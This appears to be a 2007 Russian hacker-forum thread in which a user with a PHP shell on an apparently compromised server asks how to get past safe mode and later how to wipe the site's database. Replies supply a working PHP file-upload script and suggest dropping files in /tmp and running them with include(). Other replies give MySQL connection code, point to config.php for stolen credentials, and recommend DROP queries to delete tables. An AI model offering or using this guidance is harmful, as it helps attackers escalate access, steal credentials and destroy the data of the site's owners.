ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Помощь с PHP Кодом
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Помощь с PHP Кодом
  #1  
Старый 11.01.2007, 23:36
Аватар для antiforum
antiforum
Новичок
Регистрация: 21.11.2006
Сообщений: 10
Провел на форуме:
42244

Репутация: 2
По умолчанию Помощь с PHP Кодом
Продолжение истории с шеллом:
http://forum.antichat.ru/thread31056.html

Что бы не оффтопить в той теме - открываю еще одну.

Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

Т.е. все что я могу - это выполнять код php.

Посоветуйте что можно сделать в таких условиях.
 

  #2  
Старый 11.01.2007, 23:42
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
т.е чтобы не оффтопить в одной теме, ты решил оффтопить в двух. Оригинально
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #3  
Старый 12.01.2007, 00:16
Аватар для genom--
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию
а написать код на php которые записывает файл и таким образом его залить на серв нельзя да =)
 

  #4  
Старый 12.01.2007, 00:19
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
Вот код:
Код:
<?php
set_time_limit(0);
echo <<<HTML
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<center><b><font color=red> Загругзка файла на сервер </font></b><center>  <br>
<tr>
<td><b>File:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Path:</b></td>
<td><input size="48" name="path" type="text"><input type="submit" value="OK"></td><br>
HTML;

if (isset($_POST['path'])){

$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "OK $uploadfile\n";
    echo "Name:" .$_FILES['file']['name']. "\n";
    echo "Ves:" .$_FILES['file']['size']. "\n";

} else {
    print "Error:\n";
    print_r($_FILES);
}
}
?>
 

  #5  
Старый 12.01.2007, 01:12
Аватар для EXSlim
EXSlim
Познающий
Регистрация: 09.10.2006
Сообщений: 92
Провел на форуме:
347686

Репутация: 87
Отправить сообщение для EXSlim с помощью ICQ
По умолчанию
->Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

cd /tmp
Туда и заливай.
 

  #6  
Старый 12.01.2007, 01:20
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
Цитата:
cd /tmp
Туда и заливай.
потом include("/tmp/file.php");
 

  #7  
Старый 12.01.2007, 13:46
Аватар для antiforum
antiforum
Новичок
Регистрация: 21.11.2006
Сообщений: 10
Провел на форуме:
42244

Репутация: 2
По умолчанию
Ребята спасибо за ответы, буду разгребать.

Еще, у меня есть данные от базы данных, а так как шелл находится на локалхосте - то я могу без проблем к нему подключится....

Можно ли средствами php, подключисвшись к базе - стереть ее допустим?
 

  #8  
Старый 12.01.2007, 17:21
Аватар для ettee
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию
Можно, необходимо знать логин и пароль для подключения. Обычно подключения из вне запрещены.
Код:
$host = "localhost"; // место расположения MySql
 $db_name = "grol"; // имя базы
 $db_user = "grol"; // пользователь базы
 $db_password = "admin"; // пароль пользователя
 $table_online = "online"; // имя таблицы
 // соединяемся с MySQL и выбираем нужную базу
 mysql_connect($host,$db_user,$db_password) or die(mysql_error());
 mysql_select_db($db_name) or die(mysql_error())
//http://phpfaq.ru/mysql
 

  #9  
Старый 12.01.2007, 17:57
Аватар для Abra
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию
логин и пароль соответственно ищи в файлах типа config.php движка который ее использует.
 

  #10  
Старый 12.01.2007, 18:16
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
ettee прав ) соединяешься с бд, а потом с помощью

mysql_query("ЗАПРОС"); делаешь в бд что хочешь )

например удалить таблицу

mysql_query("DROP название таблицы");

и тд
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ